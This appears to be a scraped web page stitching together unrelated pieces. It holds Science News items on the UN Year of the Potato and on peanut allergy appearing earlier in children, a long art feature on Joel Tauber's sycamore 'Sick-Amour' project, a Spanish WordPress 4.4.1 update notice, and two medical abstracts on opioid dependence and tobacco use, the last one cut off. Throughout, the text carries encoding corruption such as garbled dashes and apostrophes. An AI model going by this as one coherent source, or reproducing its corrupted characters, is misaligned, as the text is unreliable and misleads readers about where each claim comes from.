Although most people think of potatoes as a commodity, in fact, more potatoes are processed to make fast foods, snacks, and convenience items than are sold fresh in the market place. Today, China is the leading producer of spuds, followed by the Russian states and India. International trade in potatoesâworth $6 billion annuallyâhas also been growing within developing nations.
You might then ask why, with all of this pre-existing global interest in potatoes, the UN feels compelled to devote a year of workshops, research contests, and other focused attention on this one particular food. And the reason, the UN's Food and Agricultural Organization argues, is that much of the spud's potential to feed the poor remains untapped.
For instance, although Asians eat nearly half of the world's potatoes, per capita consumption even in Asia remains modestâjust 25 kilograms per year, or roughly 45 percent of U.S. consumption and just 27 percent of what's typical in Europe.
Even were potatoes to win greater respect for their nutritional attributes and ability to serve as industrial feedstocks, they couldn't necessarily make a big contribution in new regions of the world without significantly more research. The tubers are vulnerable to a host of major diseasesâlike the one that set off Ireland's 1845 potato famine. Some varieties of potato are especially resistant to particular diseases, but may not grow well in new regions of the world or taste that yummy.
That's where potato scientists come in. They can identify the climate, soil types, day length, and native diseases with which any new potato crop would have to contend. Then they'll cross lines of wild or cultivated spuds to develop ones with traits that will allow them to thrive outside the Americas. The good news, the UN program notes: "The potato has the richest genetic diversity of any cultivated plant." So there's plenty of potential to tailor a new cultivar to meet the needs of farmers in most places on the globe.
But the potato's biggest advantage, according to the International Potato Center, based in Lima, Peru, is that it yields more food, more quickly, on less land, and in harsher climates than any other major crop. Up to 85 percent of the plant is edible, compared to only about 50 percent for cereal grains. Moreover, the Center notes, potatoes "are ideally suited to places where land is limited and labor is abundantâconditions in much of the developing world."
To help get this word out to agricultural agencies in parts of the world not already turned on to spuds, and from them to farmers, the International Potato Center will be sponsoring a March 2008 meeting: Potato Science for the PoorâChallenges for the New Millennium (http://www.cipotato.org/Cuzco_conference/). Those who attend will have the opportunity to explore the possibility of cooperating to fine tune existing potatoes into higher-yielding varieties.
The International Potato Center's gene bank safeguards the largest biodiversity of potatoesâ7,500 different varieties, of which 1,950 are not cultivated. Research on spuds, especially studies aimed at fostering food security and the alleviation of poverty, have become a focus for the center.
With all of this talk of potatoes, are you hungry yet? The UN program has so far identified 172,000 web pages containing recipes for using potatoes. Stay tuned, it says: "We will gather the best of them" and share them on the Year of the Potato website.
If you would like to comment on this Food for Thought, please see the blog version.
International Year of Potato (IYP) Secretariat
Food and Agriculture Organization of the United Nations
Viale delle Terme di Caracalla
International Potato Center
Apartado Postal 1558
Gorman, J. 2000. Novel sensing system catches the dud spud. Science News 158(Nov. 25):341. Available at [Go to].
C. Graves, Ed. 2001. The Potato, Treasure of the Andes: From Agriculture to Culture. Lima, Peru: International Potato Center (208 pp). Available at [Go to].
Raloff, J. 2005. Food colorings: Pigments make fruits and veggies extra healthful. Science News 167(Jan. 8):27. Available at [Go to].
______. 2004. How carbs can make burgers safer. Science News Online (Dec. 4). Available at [Go to].
______. 2004. Coming soonâSpud lite. Science News Online (June 19). Available at [Go to].
______. 2003. How olives might enhance potatoesâand strawberries. Science News Online (May 24). Available at [Go to].
______. 2002. AcrylamideâFrom spuds to gingerbread. Science News Online (Dec. 14). Available at [Go to].
______. 1998. Taters for tots provide an edible vaccine. Science News 153(March 7):149. Available at [Go to]
|No Peanuts for Your Peanut|
Youngsters are developing peanut allergies earlier because of exposures in babyhood
Food for Thought
Peanuts are a protein-rich snack food packing plenty of vitamins and trace nutrients. However, these legumes can elicit potentially life-threatening immune reactions within the one in 100 American adults who are allergic to them. Rates of peanut allergy are even higher among children. And the really disturbing news: A new study finds that the age at which this common food allergy first shows up is falling.
Today, peanut allergy typically emerges in early toddlerhood, a team of Duke University researchers reports in the December Pediatrics. "That's almost a year earlier than what we knew, scientifically, a decade ago, "explains A. Wesley Burks, a pediatric allergist who coauthored the new study.
Although children outgrow many allergies, peanut allergy is not typically one of them. Among people who develop immune reactions to this food, 80 percent retain their allergy for life.
The new study began, Burks says, after Duke immunologists noticed that they were encountering younger patients with peanut allergy. To investigate, the researchers pulled entry records and medical charts for all 140 young patients who had come in with the allergy since 1988. Poring over the records confirmed a fall in age at first diagnosis throughout this periodâone that proved more dramatic than expected, Burks told Science News Online.
Nationally, the rate of food allergy appears to be increasing, according to a 2006 report of a National Institutes of Health expert panel. The most striking increase, it noted, has been for peanut allergy, which is also the most common food sensitivity. Because some allergies can be avoided by delaying a child's initial introduction to certain foods, in 2000 the American Academy of Pediatrics recommended that parents "consider" keeping peanuts, tree nuts, fish and shellfish out of the diet of kids under age 3.
Burks acknowledges that most parents aren't aware of this recommendation. On the other hand, most peanut allergy shows up in children that had already exhibited allergic reactions to other foodsâtypically eggs or milk. Many affected children also had skin sensitivities as infants, such as eczema or atopic dermatitis, and a parent or sibling with allergies, although not necessarily to food.
Against that background, you would think parents of the most vulnerable kids would be especially careful about introducing peanuts into the diet. And they might well have been. Indeed, Burks suspects that most initial introductions to peanuts in his young patients were inadvertent. Either a child encountered items that contained unlabeled traces of peanutsâperhaps a jelly bean, certain flavorings used in medicines, or any of several baby lotions (see Unexpected Sources of Peanut Allergy). Or perhaps the kids encountered peanut allergen in the air when others were eating, handling, or cooking foods that contained the legume.
But for now, Burks' team has no firm leads on why peanut allergies are showing up earlier. The Duke group and others will be probing that in the next few years.
Homing in on the problem
Children with peanut allergy in the new study showed the expected history of vulnerability. For instance, four in five had parents or a sib with some form of allergy. Four in five children also had personally experienced atopic dermatitis, two in every three suffered from asthma, and more than half had allergies that triggered runny noses. Moreover, blood tests from two-thirds of the youngsters turned up antibodies highlighting sensitivity to other foods, typically eggs or tree-nuts.
Half of the young patients were born between 1988 and 1999, the rest between 2000 and 2005. The average age of their peanut allergy's onset was significantly different between the two groupsâroughly 29 months old for the pre-2000 birth group, versus 15 months for children born since 2000. Within the first group, half of the children developed peanut allergy by 21 months of age; for children born since 2000, half developed their allergy by the time they were 14 months old.
In hopes of teasing out factors that contributed to the trend of earlier allergies, Burks' group is participating in a Food Allergy Research Consortium that has been given $17 million to study food allergiesâespecially to peanuts. One facet of the 5-year program, which is sponsored by NIAID, is investigating the use of shots to desensitize people with peanut allergy. In addition, some 400 infants with milk and egg allergies will be studied for signs of immunological differences that distinguish those who outgrow their allergies from those who retain them lifelong.
Currently, some 30,000 people a year are hospitalized for food allergy in the United States, and 200 die during an allergic episode. One concern, Burks notes, is that children who develop peanut allergy earlier than in the past might face a lower-than-usual chance of outgrowing their life-threatening afflictionâone that requires constant vigilance.
Such an allergy can even crimp one's social life. Consider the poor teenage girl whose lips swelled up after being kissed by her boyfriend (see A Rash of Kisses). Hours earlier, the boy had eaten peanuts, to which the girl was allergic.
If you would like to comment on this Food for Thought, please see the blog version.
American Academy of Pediatrics
141 Northwest Point Boulevard
Elk Grove Village, IL 60007
Web site: [Go to]
A. Wesley Burks
Division of Pediatric Allergy and Immunology
Duke University Medical Center
Durham, NC 27710
National Institutes of Health
National Institute of Allergy and Infectious Diseases
Office of Communications and Government Relations
6610 Rockledge Drive, MSC 6612
Bethesda, MD 20892-6612
Web site: [Go to]
Helmuth, L. 1999. Allergy vaccine may take fear out of nuts. Science News 155(April 3):213. Available at [Go to].
Long, A. 2002. The nuts and bolts of peanut allergy. New England Journal of Medicine 346(April 25):1320-1322. Extract available at [Go to].
Raloff, J. 2003. Unexpected sources of peanut allergy. Science News Online (March 15). Available at [Go to].
______. 2002. A rash of kisses. Science News 162(July 20):40. Available at [Go to].
______. 1998. The mango that thought it was poison ivy. Science News Online (Aug. 8). Available at [Go to].
______. 1997. A whiff, a sniffâthen asthma. Science News Online (Feb. 1). Available at [Go to].
______. 1996. Peanut allergy found common and increasing. Science News 150(Sept. 7):150. Available at [Go to].
_____. 1996. Family allergies? Keep nuts away from kids. Science News 149(May 4):279. Available at [Go to].
Seppa, N. 2003. Tough nut is cracked: Antibody treatment stifles peanut reactions. Science News 163(March 15):163. Available at [Go to].
|The Art of Lovin' Trees --- Featuring Joel Tauber|
The Art of Lovinâ Trees--
Featuring Artist Joel Tauber
Story dedicated to Joel and Alison
in celebration of their joyous engagement on November 9th,
Written and Researched by Enilde Van Hook
Story Consult and Editing by Luke Van Hook
America is having a love affair with trees and California is second to none in leading its appreciation of trees. Digging deep into the roots of this story, I have followed and researched the tree culture specifically in Los Angeles where our love of trees has spawned a unique pop tree culture relating to art. Our popular tree culture today includes but is not limited to tree sculptures, tree paintings, tree photographs, tree videos, tree poetry, tree songs, tree jewelry, tree movies and even tree love affairs.
Tree Earing created by Joel Tauber for his Sick-Amour Tree in Pasadena, California.
Additional Tree Jewelry created by Joel Tauber to adorn the Sick-Amour Tree includes leaf jewelry, as well as the male earing and the female earing that hang from the tree below.
Photos of tree jewelry courtesy of Susanne Vielmetter Gallery 5795 West Washington Blvd., Culver City, California 90232 www.vielmetter.com email@example.com (323-933-2117)
Sick-Amour Tree in the parkinglot of the Pasadena Rose Bowl, protected by barriers installed by Joel Tauber in his quest to save his beloved tree. Tree wearing the earings looks hot! Photo courtesy of Susanne Vielmetter Gallery.Leaf sculpture by Joel Tauber
Female tree earing by Joel Tauber.
Male tree earing created by Joel Tauber, photo courtesy of Susanne Vielmetter Gallery, 2008
For the record, our love of trees goes way back to the dawn of time when we were swinging in the trees, however, our love has grown and matured since then. The Greek and Roman heritage of literature and art bestows us with intoxicating stories of their Gods having entanglements with humans. Some of their deities were known as protectors of trees and nature such as Dionysus the Greek god of agriculture, fertility, wine and merriment. He was later renamed Bacchus by the Romans and reported to be the Tree God. Back in the day when artists carved trees into stone and marble relief sculptures to worship in the temples of their mythological gods, people celebrated the sacredness of trees, grapevines and sometimes the unions of gods and mortals. There was Pomona, the goddess of fruit trees who married Vertumnus, the god of fruits and gardens. Digging deep enough, one is sure to find stories of deities mating with trees and spawning children of the harvest for instance.
In modern literary circles there are a number of great imaginative family favorites written about trees, like âThe Giving Treeâ by Shel Silverstein. Then thereâs the infamous story of how Robinson Crusoe lived in a tree-house, and of utmost importance to our American history of trees, we propagate the very memorable legend of âJohnny Appleseedâ.
In our contemporary times we have a legend in the making too. I have been fortunate to witness the emergence of a new âJohnny Appleseedâ and interestingly enough, the story involves a recent romantic love affair between one special tree and a mortal that is well worth pursuing the story. Sometime in the fall of in 2007, I met Joel Tauber. This is the artist who I believe was struck by a mythological bolt of lighting, so to speak, pertaining to one of the Greek or Roman deitiesâ. Joel Tauber is said to have fallen head over heels in love with one particular Sycamore Tree in the parking lot of the Rose Bowl in Pasadena. My chance meeting with this now famous mortal under the influence of an enchanted mystical spell, has led me to research the mysteries intrinsic in the charms of trees. I too have been struck with the frailty of trees, their vulnerabilities, and their enormous strengths and inspiration. This together with my own personal experiences with trees has prompted me to come out of my shell and discuss the subject in all seriousness.
My own personal background is not in trees. I am simply a tree-lover from childhood. For a little over ten years, my professional background was in radio as a disc jockey and on-air personality. I listened to music, reviewed songs and kept tabs on the pop music culture. I worked in the Los Angeles market as well as Santa Barbara, California; Eventually I moved to expand my work experience in neighboring radio markets like Reno, Carson City, Lake Tahoe and Gardnerville/Minden, Nevada. It was through traveling that I saw some of the most beautiful trees along the routes through Northern California and Northern Nevada!
While I drove from one radio market to another over the years, I watched the trees go by at the various speed limits along the highways of my lifeâs journeys. Thus you will understand when I tell you that often I see art and life, for that matter, through a series of moving images in my head which include a music bed.
I was eleven years old when in 1970, Joni Mitchell wrote and released a song called âBig Yellow Taxiâ whose lyrics surpassed the test of time and is currently in airplay by a glut of new groups. The lyrics began with ââ¦They paved paradise and put up a parking lot. They took all the trees and put them in a tree museum and they charged all the people a dollar and a half just to see âem.â One of the barometers I use to gage the influence of any particular song, music or artwork that I come into contact with is if it will surpass the test of time, among other important criteria. This song became one of my favorite songs of all time. The lyrics made so much sense to me.
When I met Joel Tauber, I was introduced to the enormous scope of his Sick-Amour Tree-Baby Project. It was then that I suddenly started hearing Joni Mitchellâs song in my mind again, only this time, as I got in my car, Counting Crows was performing the song. When I started doing more research on the song that I could not get out of my head, I was struck by how many artists had re-recorded the song and barely changed anything about the words. There is Amy Grant, who upgraded the dollar amount from $1.50 to $25 when singing about how much the museums charged people to enter. Additionally there is Green Day, Sarah McLachlan, Charlie Barker, Bob Dylan, Moya Brennan, Ireen Sheer, Donnie Eidt and a host of so many others that have recorded âBig Yellow Taxiâ it was simply overwhelming!
I think the importance of the lyrics to this one particular song is that it reveals the fact that people love trees and hate parking lots. The message is that if it werenât for our trees, we could be living in a frying pan! The impact of this single song is that it reveals what is really going on in peopleâs minds. There is a reason why so many artists are flocking to re-record the lyrics in their own way.
David Byrne, Los Angeles, 1986 as Photographed by Annie Leibovitz (greeting card photo, courtesy of James Danziger Gallery, New York, Proceeds from the sale of the greeting cards were donations to AIDS organizations, copyright Annie Leibovitz and Copyright Fotofolio, Box 661 Canal Sta., NyNY, 10013.) Use in this story for the purpose of media review.
The subject of our tree culture is uniquely presented in this photo of David Byrne, from Talking Heads and demonstrates the intersection of our pop culture, music culture, tree culture, and
Not only are trees involved in the music arena, trees as subjects, are very involved in politics as well. Gaylord Nelson, a senator from Wisconsin at the time, took a leading role in developing the celebration of Earth Day on April 22nd 1970 as a way to commemorate our environmental concerns. Arbor Day is presently celebrated as well with the first ceremonial tree planting in Washington D.C. on April 27th in 2001, all evidence that goes to prove the people of our planet do care about what happens to our trees.
Dr. Martin Luther King is memorialized with trees along Expositon Blvd. across from the Los Angeles Coliseum and down the street from the University of Southern California.
Photo by Ginger Van Hook
Online sources on the subject of trees are rich in number. For instance, eighteen years ago, here in Los Angeles, a multi racial group of volunteers planted 400 Canary Island Pine trees along seven miles of road on Martin Luther King Junior Boulevard to commemorate Dr. Martin Luther Kingâs life. Today, this living homage to Dr. Martin Luther King Jr. continues to thrive and keep the dream alive for his followers. The founder and President of www.treepeople.org is Mr. Andy Lipkis and he keeps tabs on the trees to make sure all 400 trees stay healthy.
Mayor Antonio Villarigosa is the person to thank for the âMillion Trees Initiativeâ he signed into effect in May of 2006 and Los Angeles residents can learn how they too can receive up to 7 free trees to plant on their property. Visit the website at www.milliontreesla.org to learn the details. Also in Portland, Oregon there is www.friendsoftrees.org and in Bellingham Washington you will find www.geocities.com. There is also the International Society of Arboriculture called ISA and can be accessed by visiting www.isa-arbor.com. You will also find a great deal of valuable advise on the growth and care of trees at www.treesaregood.com and check out Tree Care Industry Association TCIA as well.
Mark Dion created an art piece titled "Library for the Birds of Antwerp" which is also a good example of how art is vitally connected with our tree culture and how it connects Mark Dion to his PBS special where he removed a dead tree from the forest and recreated its living components in a city scape in Washington. From the "20th Century Artbook Phaidon Press 1996", the caption reads: "Using props from the natural and man-made world, Dion has constructed an installation that explores contemporary attitudes to science and the environment. He has created a fictional and hybridized situation in which the trappings associated with knowledge, learning and classification--such as books and photographs--are juxtaposed with natural elements including birds and wood. The representation of nature is a fundamental subject in Dion's art, and here he takes on the role of sociologist/anthropologist and blurring the boundaries between authentic and fake, representation and parody. By adopting the persona of a scientist and by satirizing man's obsession with categorization, Dion questions the values of the Western world. His subject matter is heavily influence by popular culture. In Dion's world we might witness Mickey Mouse as an explorer, or Clark Kent interviewing Dr. Frankenstein." (Photo and contents are used in this story for purposes of artistic review.)
In the art world, an artist named Mark Dion was featured in a documentary film report that aired in 2007. To view the video one may visit on the Internet by going to www.pbs.org and find Mark Dion as he took the subject of trees and made an art piece that explored what would happen if one were to take a tree after its death, take it out of its familial context of natural forest, and re-create the ecosystem in an environment that would otherwise be a hostile urban setting, needless to say, a cityscape. Just outside of Seattle Washington, he states, a Hemlock fell on February 8th, 1996â¦and so begins an elaborate experiment that pits optimism against reality." The PBS special is very detailed and you will enjoy the depth of research and work that Mark Dion went to to take a tree out of the forest and recreate the setting in the city. The difference between the artwork presented by Mark Dion and the artwork presented by Joel Tauber is in the nature of the life of the tree. Mark Dion works with a dead tree and its living components, and Joel Tauber creates life out of a tree seed and duplicates it all over his community.
Thus Iâve discovered for myself that when I researched the subject of trees, I discovered Joel Tauber wasnât alone! However, instead of creating an experiment in ecology, Joel Tauber goes further than Mark Dion does with this concept of eco-systems and their frailties. Joel Tauber begins a journey that could eventually repair the eco-systems that man has destroyed. This is where Joel Tauber takes the lead in the art world and becomes not only the realist but the optimistic hope for trees in desecrated forests all over the country.
Joel Tauberâs work as a living project of art in 2008 has resonance and his story is well worth telling again and again. He is certainly not the first, nor the last to get involved in the love of trees, but he is the first in contemporary times to have been associated with a mythological and mystical occurrence of reproducing tree babies out of just hugging one lonely tree.
The last time I saw a man hugging a tree, he was hugging the tree for all the wrong reasons. At the MOCA, Los Angelesâs Museum of Contemporary Art, some years back I was viewing an exhibition that was in town by the Utah born artist now working in Los Angeles, Paul McCarthy. While this work of art depicted a very raw and unsettling sculpture of âtree-lovinâ it had nothing whatsoever to do with the love of any tree. The work displayed a timely political statement about our government rather than the love for trees, but bear in mind that the thought involved images from manâs intimate involvement with trees both in the biblical sense and in the sense of manâs raping of the planet. Joel Tauberâs work counteracts the devastation of many years of neglect for our trees with a very basic recipe for the renewal of our commitment to our green-leafed friends. Now, when I see the image of Joel Tauber hugging his Sycamore Tree in Pasadena, I get a whole new perspective for the love for our planet, our trees and our environment as a whole.
"The Garden" by Paul McCarthy from The 20th Century Art Book,
Phaidon Press Limited, page 280. Photo is used for purposes of artistic review.
The caption in the book reads as follows: " 'The Garden' is a full-scale tableau of an outdoor, woodland scene, complete with leafy trees, shrubs and rocks. This tranquil picture of nature is rudely interrupted by the presence of a middle-aged, balding man with his trousers round his ankles, engaged in a wholly unnatural act. From one side of the installation, his actions are not immediately apparent, being partially hidden by the tree trunks and foliage, but the sound of mechanical activity draws the viewer in to discover the shocking sight of a man copulating with a tree. This robotic figure, with its endlessly repetitive movements, is both comical and crude, and is intended by McCarthy to question notions of acceptable public behavior and sexual morality. McCarthy is a lecturer at UCLA as well as an artist. His sculptural installations evolved out of his earlier performance work which focused on his own body engaged in extreme and disturbing acts."
Joel Tauber fell in love with a frail and neglected Sycamore Tree in the parkinglot of the Pasadena Rose Bowl. Instead of walking away and minding his own business, Joel Tauber got involved. He personally took on the responsibility of watering the tree, digging up the asphalt around the tree and adding barriers so the tree would not be wounded by cars hitting it while trying to park. Photo courtesy of Susanne Viemetter Gallery.
To further explain this romantic entanglement between a tree and a mortal, I cite some important historical facts. Back in 2005, Joel Tauber was in the parking lot of the Pasadena Rose Bowl, when he spotted a particularly lonely and neglected Sycamore Tree. There are hundreds of thousands of trees in Pasadena, and a great number of them thrive very well on the grounds of the Rose Bowl, should you ever drive through this luscious community of tree and rose-lovers, you will see. But Joel Tauber focused his attention on one specific lonely tree. He started to note more and more how cars would hit the bark of the tree and scrape it, injuring the tree repeatedly. Joel Tauber became a witness to this treeâs life. Taking compassion and friendship upon this particular tree, Tauber began to film the area of the parking lot where the tree was growing. He got the idea to put up solid barriers to protect it from cars and also carried water in large plastic bags to irrigate the tree. Soon, Tauber found himself as a one-man band, orchestrating a symphony of activities leading to editing mass quantities of tree footage, fighting City Hall, and embarking on a quest to save this tree from infertility using tried and true guerilla tactics that would make tree-huggers stand and salute. To personally view the Sick-Amour project, along with the giant scale tree sculpture installation exhibited at Susanne Vielmetter Gallery in 2007, you may visit www.vielmetter.com.
Susanne Vielmetter's Gallery is located on the corner of David Street and Washington Blvd., just before the entrance to the 10 freeway, right in the midst of the Culver City Arts District. Photo by Ginger Van Hook, 2008
Recently, I had the privilege and opportunity to discuss Joel Tauberâs work with Susanne Vielmetter and she was delighted to tell me what a wonderful sense of humor that Tauber exhibits in all of his works of art. Susanne Vielmetter reviewed the Underwater project with me as well as the Flying Project which Tauber presented.
She explained how deep down, she feels Tauber is on a quest for meaning in his work and that he has a keen sense of humor that unifies and makes his ideas successful. She states that he uses the comical and the tragic in the Tree-Baby project to address the issues of urban living in our time and very subtly pokes fun at the problems innate in urban planning. The real irony of a small Sycamore tree dying of thirst in a parking lot of a beautiful park in a paradise-like valley, alongside the 110 Pasadena Freeway where 80% of the territory is plastered with concrete and the water below runs along asphalt channels of the Los Angeles River is not lost on Tauber, she explained. To contrast, Susanne Vielmetter cited that parks in Europe allow for weeds to grow naturally on landscapes that are not covered with concrete. Joel Tauberâs projects were initially presented at the Susanne Vielmetter Gallery located at 5795 Washington Blvd., in Culver City, California. The response Susanne Vielmetterâs Gallery received was incredibly exciting, even though at first, some folks thought Joel Tauber was a nut; he went on to prove just how serious he really is about changing the landscape of our environment, one tree at a time.
Joel Tauber has a large body of video artwork, photographs and developing tree babies, (the children of a mortal and a Charmed Sycamore Tree) and one may also visit www.joeltauber.com.
The first thing that struck me about Joel Tauber was that we had the love of trees in common. He seemed a bit shy, unassuming and humble yet I was later to learn the enormous power he wielded for this one frail and neglected tree in the parking lot of the Pasadena Rose Bowl in California. I was truly inspired by the level of involvement and commitment he had demonstrated for his own beloved Sycamore Tree which he had turned into a full-blown art-project including video, photography and sculptured jewelry. (He did it all!) He named this work the Sick-Amour Project mainly because he said he felt this tree was ill from the lack of love and the inability to have tree babies to fulfill its legacy. I had never personally met someone with such an extreme love and dedication to one particular tree. In our local newscasts, I had heard stories of people who became very emotional when a land developer was about to cut down a tree they considered a relic of their community; in which case people got very nasty about the issue and would chain themselves to the trees or surround the location with demonstrators that would shut down the jobsite. Thatâs when the news crews would come in with their cameras and boom mikes and the news helicopters would hover in circles above the trees trying to capture the âeventâ that was creating all the uproar. A very recent example of this type of community behavior is written about on the front pages of the Los Angeles Times where Eric Bailey, a Times Staff Writer, wrote an extensive story about the tree-issues pertaining to Scotia, California where activists are protesting the logging of the Great California REDWOODS! Read the Sunday edition of the Los Angeles Times, August 24th, 2008 or visit www.latimes.com online to learn how the tree-sitters are doing today.
But Joel Tauber is a different type of activist. He doesnât consider himself an activist at all. He merely states, humbly, just for the record, that he loves this one particular Sycamore Tree and it is an outrage to him to see how his new best friend is being suffocated under a six-inch blanket of black tar and asphalt. Better yet, Joel Tauber does something about it. Not with a crew of forty thousand demonstrators, not even with a crew of forty residents. He does this on his own, quietly challenging the laws of the city of Pasadena and humbly takes responsibility for the care and nurturing of his new best friend. I was touched. At once I began to marvel at his potent idea.
The art of loving our trees has grown roots in the higher levels of the art world as well. For instance, if one were to visit the J. Paul Getty Museum both at the Getty Villa which recently re-opened in Malibu and at the Getty Center in Los Angeles, you will find the love of trees has grown branches on all the hillsides surrounding both properties. There are lucky Sycamores and fortunate Pines; there are Pomegranate trees, Apple trees, Pear trees, Jacaranda trees and trees that just look good in a vista overlooking the ocean. Millions of dollars went into the development of artistic gardens which envelope the California landscape against a backdrop of the Pacific Ocean on one edge and the rolling hills of Malibu on the other.
Over in the area of the Miracle Mile, the Los Angeles County Museum of Art is celebrating an enormous renovation of its facilities and you guessed it, there are aisles and isles of gigantic palm trees lining the walkways to the entrance of the museum in concert with a unique and flamboyant architecture that has drawn the attention of the art-world with the generosity of Eli and Edythe Broad of the Broad Foundation. The Broad Contemporary Art Museum is the new wing at the LACMA and is considered the largest space in the country devoted exclusively to contemporary art. With a âliving art displayâ dedicated to the iconic palm trees, not native to California, Robert Irwin has developed a plein-air walkway through âPalm Gardensâ as one makes their way to the entrances of the museum.
Lush green trees thrive all over Pasadena, California, home of the Rose Bowl where Joel Tauber fell in love with a Sycamore Tree. Photo by Ginger Van Hook, 2008
The Norton Simon Museum in Pasadena, California is also home to some of the most exquisite antiquities in its museum history which includes sculptures amid a forest like atmosphere. Currently at the Norton Simon Museum, among its many exhibitions, one may enjoy the artwork of Ruth Weisberg, Dean of the Gayle Garner Roski School of Fine Arts at the University of Southern California. Opening on October 17, 2008 the Weisberg exhibition at the Norton Simon runs through March 2, 2009. Additionally a lecture by the artist is planned where Weisberg discusses: Guido Cagnacci and the Resonant Image on Sunday November 16, 2008. The Norton Simon Museum of Art is located at 411 West Colorado Blvd. in Pasadena, California. Ruth Weisberg was instrumental in selecting the work of Joel Tauber to be permanently planted on the Main University Campus of USC on January 24, 2008 where a tree planting ceremony was held and attended by numerous members of USC faculty, staff, students and guests. The location of the new tree-baby, child of the Sick-Amour Project, currently exists on the Exposition side of the campus between Gate one and the Fischer Gallery, across the street from the Museum of Natural History.
In Pasadena, where lovers of trees line every street of the city as the landscapes are lush with all types of trees and where these wonderful healthy trees keep cool the throngs of tourists who visit the Rose Bowl every year, is also home to the Norton Simon Museum and the Pasadena Museum of California Art. Both locations are areas where tree-lovinâ may be experienced alongside some of Californiaâs best-known artworks. Visit the NORTON SIMON MUSEUM at www.nortonsimon.org located at 411 West Colorado, Pasadena, California 91105 or visit the PASADENA MUSEUM OF CALIFORNIA ART at www.pmcaonline.com at 490 East Union Street, Pasadena, California.
In San Marino, California, the art of trees, gardens and succulents has found a worthy haven at the Huntington Library and Botanical Gardens spanning an area of 120 acres dedicated to the fine arts founded by Henry E. Huntington in 1928 as the very first public art gallery in Southern California. Along with English portraits and French eighteenth-century furniture, one will delight in tours of the unique garden paradise established for the pure love of the botanical arts.
On the hillside along the 405 Freeway in Los Angeles, one may also enjoy walking along the elegant landscapes of the Skirball Cultural Center and Museum grounds and witness the serenity of the trees as Weeping Willows slope their leaves to the ground, and gentle breezes sway the branches of Sycamores, Oaks and Birch trees. Visit the Skirball Museum online at www.skirball.org, or enjoy a personal walk along the grounds and explore the tributes to culture at 2701 North Sepulveda, Los Angeles 90049.
Trees at the Skirball Museum and Cultural Center thrive and enjoy the mild California climate.
In San Diego, one enjoys walking through a vast museum complex housing 15 unique museums in Balboa Park, not to mention to the collection of rare cactus and enormous Eucalyptus trees (just to name one tree type out of numerous ones) which shade the paths leading from one museum to another.
Each of the locations I have mentioned or described here is where I personally walked through, witnessed, and or photographed sophisticated artistic tree landscapes of the California terrain.
The Roots of my personal anxieties: Why I care.
The impact of my meeting Joel Tauber coincided with an important event that took place for me way before I knew about his Sick-Amour Tree project and was what eventually led me to throw myself into this frenzied study of trees over this summer. Thus I do not necessarily consider myself struck by any of the Greek or Roman gods. I believe my influence came with a special awareness of the frailty of trees with this personal story:
A little over one year ago, on June 30th, 2007 I was walking our dog Sasha, around the block for one of our frequent walks. I rounded the corner to the next block when I was taken aback as I witnessed a set of âcityâ crewmembers slaughtering what appeared to be a California Oak tree. I had grown quite fond of that particular Oak on my many walks while I was writing my first novel. As a matter of fact, I had used that model of tree to describe a forest of these trees in a chapter in my first fiction novel. I especially love the sculptured texture of the Mighty gnarly Oaks. This tree had been the one to rekindle my relationship with the trees of my imagination. My stomach got queasy when I saw how it was being destroyed. I would have thrown-up, but I got a hold of my emotions and took Sasha home. Not only did I return to the scene of the slaughter, but I brought my camera to document the death and dismemberment of this great oak; I was so distraught that I returned again to the site, without my camera this time, and begged the men to stop for a moment while I sought out the seeds for this tree. To my surprise, the men stopped and helped me search for the seeds.
When I got home, I had no idea what to do with the seeds. I called a couple of nurseries until a gentleman at a nursery in Marina del Rey explained to me that I had to wait until the pods dried up and slit to get at the seeds and plant them. So, I waited until the pods were black and wrinkled. I split them according to the directions I had gotten from this kind anonymous arborist. (He suggested a process much like that which squirrels have for cracking the pods.) I photographed the seeds and compared them with the larger seed of an apricot fruit tree and the seed of a maple tree.
Once properly documented, I planted them in a small brown pot. Two weeks later, the first seed came up. A few days later another seed appeared to take root. On the one-year anniversary of the re-birth day of this Great Knurly Oak tree, July 20th, 2008, I documented how large the great twin oaks had become. The highest little bitty branch was about fourteen inches tall. I estimated this tree had grown a little over an inch every month. A compassionate act of kindness yielded a new life on the impulse of grief. The impulse of grief affected not only me; there is an entire world of tree-lovers mourning the losses of their favorite tree friends in surrounding communities.
I named my new baby tree "Gemini" because two seeds had grown side by side into what appears as two trees intertwined.
My baby tree "Gemini" has grown in quite tall, as in November 08, 2008 it already reaches my windowsill. Photo by Ginger Van Hook, 2008
What about the subconscious feelings innate in developing a relationship with a tree? For instance, what draws people to want to save a particular tree?
|WordPress 4.4.1||WordPress 4.4.1 Â MÃ¡s seguro – MÃ¡s responsive – Nuevo plugin REST-API! MÃ¡s seguro La mejora mÃ¡s importante que ha hecho wordpress es en su seguridad,Â las versionesÂ de WordPress 4.4 y anteriores se ven afectados por una vulnerabilidad de cross-site scripting que podrÃa hacer que la seguridad de un sitio se vea comprometida. Te recomiendo que actualices, […]|
|Possible Evidence for Re-regulation of HPA Axis and Brain Reward Systems Over Time in Treatment in Prescription Opioid-Dependent Patients||Objectives: There is growing evidence for a neuroadaptive model underlying vulnerability to relapse in opioid dependence. The purpose of this study was to evaluate clinical measures hypothesized to mirror elements of allostatic dysregulation in patients dependent on prescription opioids at 2 time points after withdrawal, compared with healthy control participants.
Methods: Recently withdrawn (n = 7) prescription opioid-dependent patients were compared with the patients in supervised residential care for 2 to 3 months (extended care; n = 7) and healthy controls (n = 7) using drug cue reactivity, affect-modulated startle response tasks, salivary cortisol, and 8 days of sleep actigraphy. Prefrontal cortex was monitored with functional near-infrared spectroscopy during the cue reactivity task.
Results: Startle response results indicated reduced hedonic response to natural rewards among patients recently withdrawn from opioids relative to extended care patients. The recently withdrawn patients showed increased activation to pill stimuli in right dorsolateral prefrontal cortex relative to extended care patients. Cortisol levels were elevated among recently withdrawn patients and intermediate for extended care relative to healthy controls. Actigraphy indicated disturbed sleep between recently withdrawn patients and extended care patients; extended care patients were similar to controls. Dorsolateral prefrontal cortex activation to drug and natural reward cues, startle responses to natural reward cues, day-time cortisol levels, time in bed, and total time spent sleeping were all correlated with the number of days since last drug use (ie, time in supervised residential treatment).
Conclusions: These results suggest possible re-regulation of dysregulated hypothalamic-pituitary-adrenal axis and brain reward systems in prescription opioid-dependent patients over the drug-free period in residential treatment.|
|Tobacco Use Disorder Among Patients With Smoking-related Chronic Medical Disease: Association With Comorbid Substance Use Disorders||Introduction: Very little is known of the behavioral vulnerabilities of patients diagnosed with smoking-related chronic medical illness who continue to smoke, potentially worsening morbidity and mortality risks. This study explores the association of tobacco use disorder (TUD) among those with smoking-related chronic medical illnesses with other substance use disorders (SUDs) and risk factors.
